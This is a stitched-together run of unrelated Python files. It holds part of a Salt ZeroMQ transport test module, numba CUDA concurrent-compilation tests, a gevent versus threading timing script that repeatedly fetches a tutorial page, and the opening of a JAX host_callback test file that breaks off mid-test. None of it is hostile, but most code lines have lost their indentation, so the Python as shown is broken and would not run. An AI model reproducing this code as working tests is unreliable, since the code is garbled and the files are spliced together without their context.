#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
@slowTest
def test_badload(self):
"""
Test a variety of bad requests, make sure that we get some sort of error
"""
# TODO: This test should be re-enabled when Jenkins moves to C7.
# Once the version of salt-testing is increased to something newer than the September
# release of salt-testing, the @flaky decorator should be applied to this test.
msgs = ["", [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg, timeout=5)
class BaseZMQPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
"""
    Test the pub server/client pair
"""
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
}
)
cls.minion_config = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
cls.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager"
)
cls.server_channel = salt.transport.server.PubServerChannel.factory(
cls.master_config
)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
cls.master_config
)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = salt.ext.tornado.ioloop.IOLoop()
cls.evt = threading.Event()
cls.req_server_channel.post_fork(
cls._handle_payload, io_loop=cls._server_io_loop
)
cls.server_thread = threading.Thread(
target=run_loop_in_thread, args=(cls._server_io_loop, cls.evt)
)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.process_manager.kill_children()
cls.process_manager.stop_restarting()
time.sleep(
2
) # Give the procs a chance to fully close before we stop the io_loop
cls.evt.set()
cls.server_thread.join()
cls.req_server_channel.close()
cls.server_channel.close()
cls._server_io_loop.stop()
del cls.server_channel
del cls._server_io_loop
del cls.process_manager
del cls.server_thread
del cls.master_config
del cls.minion_config
@classmethod
def _handle_payload(cls, payload):
"""
TODO: something besides echo
"""
return payload, {"fun": "send_clear"}
def setUp(self):
super().setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super().tearDown()
failures = []
for k, v in self.io_loop._handlers.items():
if self._start_handlers.get(k) != v:
failures.append((k, v))
del self._start_handlers
if len(failures) > 0:
raise Exception("FDs still attached to the IOLoop: {}".format(failures))
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseZMQPubCase, PubChannelMixin):
"""
Tests around the publish system
"""
def get_new_ioloop(self):
return salt.ext.tornado.ioloop.IOLoop()
class AsyncReqMessageClientPoolTest(TestCase):
def setUp(self):
super().setUp()
sock_pool_size = 5
with patch(
"salt.transport.zeromq.AsyncReqMessageClient.__init__",
MagicMock(return_value=None),
):
self.message_client_pool = AsyncReqMessageClientPool(
{"sock_pool_size": sock_pool_size}, args=({}, "")
)
self.original_message_clients = self.message_client_pool.message_clients
self.message_client_pool.message_clients = [
MagicMock() for _ in range(sock_pool_size)
]
def tearDown(self):
del self.original_message_clients
super().tearDown()
def test_send(self):
for message_client_mock in self.message_client_pool.message_clients:
message_client_mock.send_queue = [0, 0, 0]
message_client_mock.send.return_value = []
self.assertEqual([], self.message_client_pool.send())
self.message_client_pool.message_clients[2].send_queue = [0]
self.message_client_pool.message_clients[2].send.return_value = [1]
self.assertEqual([1], self.message_client_pool.send())
class ZMQConfigTest(TestCase):
def test_master_uri(self):
"""
test _get_master_uri method
"""
m_ip = "127.0.0.1"
m_port = 4505
s_ip = "111.1.0.1"
s_port = 4058
m_ip6 = "1234:5678::9abc"
s_ip6 = "1234:5678::1:9abc"
with patch("salt.transport.zeromq.LIBZMQ_VERSION_INFO", (4, 1, 6)), patch(
"salt.transport.zeromq.ZMQ_VERSION_INFO", (16, 0, 1)
):
# pass in both source_ip and source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip, source_port=s_port
) == "tcp://{}:{};{}:{}".format(s_ip, s_port, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6, source_port=s_port
) == "tcp://[{}]:{};[{}]:{}".format(s_ip6, s_port, m_ip6, m_port)
# source ip and source_port empty
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port
) == "tcp://{}:{}".format(m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port
) == "tcp://[{}]:{}".format(m_ip6, m_port)
# pass in only source_ip
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_ip=s_ip
) == "tcp://{}:0;{}:{}".format(s_ip, m_ip, m_port)
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip6, master_port=m_port, source_ip=s_ip6
) == "tcp://[{}]:0;[{}]:{}".format(s_ip6, m_ip6, m_port)
# pass in only source_port
assert salt.transport.zeromq._get_master_uri(
master_ip=m_ip, master_port=m_port, source_port=s_port
) == "tcp://0.0.0.0:{};{}:{}".format(s_port, m_ip, m_port)
class PubServerChannel(TestCase, AdaptedConfigurationTestCaseMixin):
@classmethod
def setUpClass(cls):
ret_port = get_unused_localhost_port()
publish_port = get_unused_localhost_port()
tcp_master_pub_port = get_unused_localhost_port()
tcp_master_pull_port = get_unused_localhost_port()
tcp_master_publish_pull = get_unused_localhost_port()
tcp_master_workers = get_unused_localhost_port()
cls.master_config = cls.get_temp_config(
"master",
**{
"transport": "zeromq",
"auto_accept": True,
"ret_port": ret_port,
"publish_port": publish_port,
"tcp_master_pub_port": tcp_master_pub_port,
"tcp_master_pull_port": tcp_master_pull_port,
"tcp_master_publish_pull": tcp_master_publish_pull,
"tcp_master_workers": tcp_master_workers,
"sign_pub_messages": False,
}
)
salt.master.SMaster.secrets["aes"] = {
"secret": multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
),
),
}
cls.minion_config = cls.get_temp_config(
"minion",
**{
"transport": "zeromq",
"master_ip": "127.0.0.1",
"master_port": ret_port,
"auth_timeout": 5,
"auth_tries": 1,
"master_uri": "tcp://127.0.0.1:{}".format(ret_port),
}
)
@classmethod
def tearDownClass(cls):
del cls.minion_config
del cls.master_config
def setUp(self):
# Start the event loop, even though we don't directly use this with
# ZeroMQPubServerChannel, having it running seems to increase the
        # likelihood of dropped messages.
self.io_loop = salt.ext.tornado.ioloop.IOLoop()
self.io_loop.make_current()
self.io_loop_thread = threading.Thread(target=self.io_loop.start)
self.io_loop_thread.start()
self.process_manager = salt.utils.process.ProcessManager(
name="PubServer_ProcessManager"
)
def tearDown(self):
self.io_loop.add_callback(self.io_loop.stop)
self.io_loop_thread.join()
self.process_manager.stop_restarting()
self.process_manager.kill_children()
del self.io_loop
del self.io_loop_thread
del self.process_manager
@staticmethod
def _gather_results(opts, pub_uri, results, timeout=120, messages=None):
"""
        Gather results until the number of seconds specified by timeout passes
        without receiving a message
"""
ctx = zmq.Context()
sock = ctx.socket(zmq.SUB)
sock.setsockopt(zmq.LINGER, -1)
sock.setsockopt(zmq.SUBSCRIBE, b"")
sock.connect(pub_uri)
last_msg = time.time()
serial = salt.payload.Serial(opts)
crypticle = salt.crypt.Crypticle(
opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
while time.time() - last_msg < timeout:
try:
payload = sock.recv(zmq.NOBLOCK)
except zmq.ZMQError:
time.sleep(0.01)
else:
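                # If `messages` is set, the first messages-1 frames are skipped
                # without decoding; only the remaining frames are decrypted and
                # their jids collected.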
if messages:
if messages != 1:
messages -= 1
continue
payload = crypticle.loads(serial.loads(payload)["load"])
if "stop" in payload:
break
last_msg = time.time()
results.append(payload["jid"])
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_publish_to_pubserv_ipc(self):
"""
        Test sending 10K messages to ZeroMQPubServerChannel using IPC transport
ZMQ's ipc transport not supported on Windows
"""
opts = dict(self.master_config, ipc_mode="ipc", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
        # Allow time for server channel to start, especially on Windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@skipIf(salt.utils.platform.is_linux(), "Skip on Linux")
@slowTest
def test_zeromq_publish_port(self):
"""
        test that when connecting we use the
        publish_port set in opts when it's not 4506
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
recon_randomize=False,
publish_port=455505,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
patch_socket = MagicMock(return_value=True)
patch_auth = MagicMock(return_value=True)
with patch.object(channel, "_socket", patch_socket), patch.object(
channel, "auth", patch_auth
):
channel.connect()
assert str(opts["publish_port"]) in patch_socket.mock_calls[0][1][0]
@skipIf(salt.utils.platform.is_linux(), "Skip on Linux")
def test_zeromq_zeromq_filtering_decode_message_no_match(self):
"""
        test AsyncZeroMQPubChannel _decode_messages when
        zmq_filtering is enabled and the minion does not match
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846eb",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result() is None
@skipIf(salt.utils.platform.is_linux(), "Skip on Linux")
def test_zeromq_zeromq_filtering_decode_message(self):
"""
test AsyncZeroMQPubChannel _decode_messages
        when zmq_filtering is enabled
"""
message = [
b"4f26aeafdb2367620a393c973eddbe8f8b846ebd",
b"\x82\xa3enc\xa3aes\xa4load\xda\x00`\xeeR\xcf"
b"\x0eaI#V\x17if\xcf\xae\x05\xa7\xb3bN\xf7\xb2\xe2"
b'\xd0sF\xd1\xd4\xecB\xe8\xaf"/*ml\x80Q3\xdb\xaexg'
b"\x8e\x8a\x8c\xd3l\x03\\,J\xa7\x01i\xd1:]\xe3\x8d"
b"\xf4\x03\x88K\x84\n`\xe8\x9a\xad\xad\xc6\x8ea\x15>"
b"\x92m\x9e\xc7aM\x11?\x18;\xbd\x04c\x07\x85\x99\xa3\xea[\x00D",
]
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
recon_randomize=False,
recon_default=1,
recon_max=2,
master_ip="127.0.0.1",
acceptance_wait_time=5,
acceptance_wait_time_max=5,
)
opts["master_uri"] = "tcp://{interface}:{publish_port}".format(**opts)
server_channel = salt.transport.zeromq.AsyncZeroMQPubChannel(opts)
with patch(
"salt.crypt.AsyncAuth.crypticle",
MagicMock(return_value={"tgt_type": "glob", "tgt": "*", "jid": 1}),
) as mock_test:
res = server_channel._decode_messages(message)
assert res.result()["enc"] == "aes"
@skipIf(salt.utils.platform.is_windows(), "Skip on Windows OS")
@slowTest
def test_zeromq_filtering(self):
"""
        Test sending messages to the publisher
with zeromq_filtering enabled
"""
opts = dict(
self.master_config,
ipc_mode="ipc",
pub_hwm=0,
zmq_filtering=True,
acceptance_wait_time=5,
)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 1
expect = []
results = []
gather = threading.Thread(
target=self._gather_results,
args=(self.minion_config, pub_uri, results,),
kwargs={"messages": 2},
)
gather.start()
        # Allow time for server channel to start, especially on Windows
time.sleep(2)
expect.append(send_num)
load = {"tgt_type": "glob", "tgt": "*", "jid": send_num}
with patch(
"salt.utils.minions.CkMinions.check_minions",
MagicMock(
return_value={
"minions": ["minion"],
"missing": [],
"ssh_minions": False,
}
),
):
server_channel.publish(load)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@slowTest
def test_publish_to_pubserv_tcp(self):
"""
        Test sending 10K messages to ZeroMQPubServerChannel using TCP transport
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
pub_uri = "tcp://{interface}:{publish_port}".format(**server_channel.opts)
send_num = 10000
expect = []
results = []
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
        # Allow time for server channel to start, especially on Windows
time.sleep(2)
for i in range(send_num):
expect.append(i)
load = {"tgt_type": "glob", "tgt": "*", "jid": i}
server_channel.publish(load)
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
@staticmethod
def _send_small(opts, sid, num=10):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {"tgt_type": "glob", "tgt": "*", "jid": "{}-{}".format(sid, i)}
server_channel.publish(load)
server_channel.pub_close()
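    # _send_large (below) pads each payload with ~750 kB of "0" characters so
    # that large and small publishes are interleaved on the same pub socket
    # (exercised by test_issue_36469_tcp).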
@staticmethod
def _send_large(opts, sid, num=10, size=250000 * 3):
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
for i in range(num):
load = {
"tgt_type": "glob",
"tgt": "*",
"jid": "{}-{}".format(sid, i),
"xdata": "0" * size,
}
server_channel.publish(load)
server_channel.pub_close()
@skipIf(salt.utils.platform.is_freebsd(), "Skip on FreeBSD")
@slowTest
def test_issue_36469_tcp(self):
"""
        Test sending both large and small messages to the publisher using TCP
https://github.com/saltstack/salt/issues/36469
"""
opts = dict(self.master_config, ipc_mode="tcp", pub_hwm=0)
server_channel = salt.transport.zeromq.ZeroMQPubServerChannel(opts)
server_channel.pre_fork(
self.process_manager,
kwargs={"log_queue": salt.log.setup.get_multiprocessing_logging_queue()},
)
send_num = 10 * 4
expect = []
results = []
pub_uri = "tcp://{interface}:{publish_port}".format(**opts)
        # Allow time for server channel to start, especially on Windows
time.sleep(2)
gather = threading.Thread(
target=self._gather_results, args=(self.minion_config, pub_uri, results,)
)
gather.start()
with ThreadPoolExecutor(max_workers=4) as executor:
executor.submit(self._send_small, opts, 1)
executor.submit(self._send_small, opts, 2)
executor.submit(self._send_small, opts, 3)
executor.submit(self._send_large, opts, 4)
expect = ["{}-{}".format(a, b) for a in range(10) for b in (1, 2, 3, 4)]
time.sleep(0.1)
server_channel.publish({"tgt_type": "glob", "tgt": "*", "stop": True})
gather.join()
server_channel.pub_close()
assert len(results) == send_num, (len(results), set(expect).difference(results))
class AsyncZeroMQReqChannelTests(TestCase):
def test_force_close_all_instances(self):
zmq1 = MagicMock()
zmq2 = MagicMock()
zmq3 = MagicMock()
zmq_objects = {"zmq": {"1": zmq1, "2": zmq2}, "other_zmq": {"3": zmq3}}
with patch(
"salt.transport.zeromq.AsyncZeroMQReqChannel.instance_map", zmq_objects
):
salt.transport.zeromq.AsyncZeroMQReqChannel.force_close_all_instances()
self.assertEqual(zmq1.mock_calls, [call.close()])
self.assertEqual(zmq2.mock_calls, [call.close()])
self.assertEqual(zmq3.mock_calls, [call.close()])
# check if instance map changed
self.assertIs(
zmq_objects, salt.transport.zeromq.AsyncZeroMQReqChannel.instance_map
)
|
test_multithreads.py
|
import traceback
import threading
import multiprocessing
import numpy as np
from numba import cuda
from numba.cuda.testing import skip_on_cudasim, CUDATestCase
import unittest
try:
from concurrent.futures import ThreadPoolExecutor
except ImportError:
has_concurrent_futures = False
else:
has_concurrent_futures = True
has_mp_get_context = hasattr(multiprocessing, 'get_context')
def check_concurrent_compiling():
@cuda.jit
def foo(x):
x[0] += 1
def use_foo(x):
foo[1, 1](x)
return x
arrays = [np.arange(10) for i in range(10)]
expected = np.arange(10)
expected[0] += 1
with ThreadPoolExecutor(max_workers=4) as e:
for ary in e.map(use_foo, arrays):
np.testing.assert_equal(ary, expected)
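# spawn_process_entry runs the concurrent-compilation check inside a child
# process and reports either None (success) or a formatted traceback back to
# the parent through the queue.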
def spawn_process_entry(q):
try:
check_concurrent_compiling()
except:
msg = traceback.format_exc()
q.put('\n'.join(['', '=' * 80, msg]))
else:
q.put(None)
@skip_on_cudasim('disabled for cudasim')
class TestMultiThreadCompiling(CUDATestCase):
@unittest.skipIf(not has_concurrent_futures, "no concurrent.futures")
def test_concurrent_compiling(self):
check_concurrent_compiling()
@unittest.skipIf(not has_mp_get_context, "no multiprocessing.get_context")
def test_spawn_concurrent_compilation(self):
# force CUDA context init
cuda.get_current_device()
# use "spawn" to avoid inheriting the CUDA context
ctx = multiprocessing.get_context('spawn')
q = ctx.Queue()
p = ctx.Process(target=spawn_process_entry, args=(q,))
p.start()
try:
err = q.get()
finally:
p.join()
if err is not None:
raise AssertionError(err)
self.assertEqual(p.exitcode, 0, 'test failed in child process')
def test_invalid_context_error_with_d2h(self):
def d2h(arr, out):
out[:] = arr.copy_to_host()
arr = np.arange(1, 4)
out = np.zeros_like(arr)
darr = cuda.to_device(arr)
th = threading.Thread(target=d2h, args=[darr, out])
th.start()
th.join()
np.testing.assert_equal(arr, out)
def test_invalid_context_error_with_d2d(self):
def d2d(dst, src):
dst.copy_to_device(src)
arr = np.arange(100)
common = cuda.to_device(arr)
darr = cuda.to_device(np.zeros(common.shape, dtype=common.dtype))
th = threading.Thread(target=d2d, args=[darr, common])
th.start()
th.join()
np.testing.assert_equal(darr.copy_to_host(), arr)
if __name__ == '__main__':
unittest.main()
|
get_url.py
|
import time
import gevent
import urllib2
import simplejson as json
import threading
import gevent.monkey
gevent.monkey.patch_socket()
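# patch_socket() swaps in gevent's cooperative socket implementation, so the
# blocking urllib2 calls in fetch() yield to the gevent hub instead of
# blocking the whole process.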
THREAD_NUM = 150
COUNT = 100000
def fetch(pid):
start = time.time()
response = urllib2.urlopen('http://sdiehl.github.io/gevent-tutorial/')
result = response.read()
#json_result = json.loads(result)
#datetime = json_result['datetime']
print('Process %s: %s\n' % (pid, time.time()-start))
#return json_result['datetime']
def compute(count):
tmp = count
# start = time.time()
while count > 0:
count -= 1
# print('Process %s: %s\n' % (tmp, time.time()-start))
def synchronous():
for i in range(1, THREAD_NUM):
fetch(i)
def asynchronous():
threads = []
for i in range(1,THREAD_NUM):
threads.append(gevent.spawn(fetch, i))
gevent.joinall(threads)
def async_cpu():
threads = []
for i in range(1,THREAD_NUM):
threads.append(gevent.spawn(compute, COUNT))
gevent.joinall(threads)
class UrlThread(threading.Thread):
# IO threads
def __init__(self, index):
super(UrlThread, self).__init__()
self.index = index
def run(self):
fetch(self.index)
class CPUThread(threading.Thread):
    # CPU-bound threads
def __init__(self, count):
super(CPUThread, self).__init__()
self.count = count
def run(self):
while self.count > 0:
self.count -= 1
def async_thread(thread_class):
threads = []
for i in range(1, THREAD_NUM):
# t = threading.Thread(target=fetch, args=[i])
t = thread_class(COUNT)
t.start()
threads.append(t)
for t in threads:
t.join()
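# Note: under CPython's GIL the CPU-bound loops gain nothing from OS threads,
# and gevent greenlets don't help either because compute() never yields; only
# the I/O-bound fetch() benefits from cooperative scheduling.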
# print('Synchronous:')
# t0 = time.time()
# synchronous()
# print ('cost:%s' % (time.time() - t0))
# print('Asynchronous:')
# t1 = time.time()
# asynchronous()
# print ('cost:%s' % (time.time() - t1))
print('Asynchronous(Thread):')
t2 = time.time()
async_thread(CPUThread)
print ('cost:%s' % (time.time() - t2))
print('Asynchronous(cpu-bound, gevent):')
t3 = time.time()
async_cpu()
print ('cost:%s' % (time.time() - t3))
|
host_callback_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import core
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax._src import test_util as jtu
from jax import tree_util
from jax._src.lib import xla_bridge
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
  # Tests require at most 2 devices.
return jax.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d*\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
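# Debugging helpers: helper_set_hlo_dump points XLA_FLAGS at a fresh dump
# directory, while helper_print_optimized_hlo and helper_log_ir print the
# jaxpr / compiled HLO for a function (optionally stripping per-op metadata).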
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = xla_bridge.get_backend()
c = jax.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax)(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.arange(num_partitions * num_replicas)
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
      device_under_test is not a CPU, then we change the device names.
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00 b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
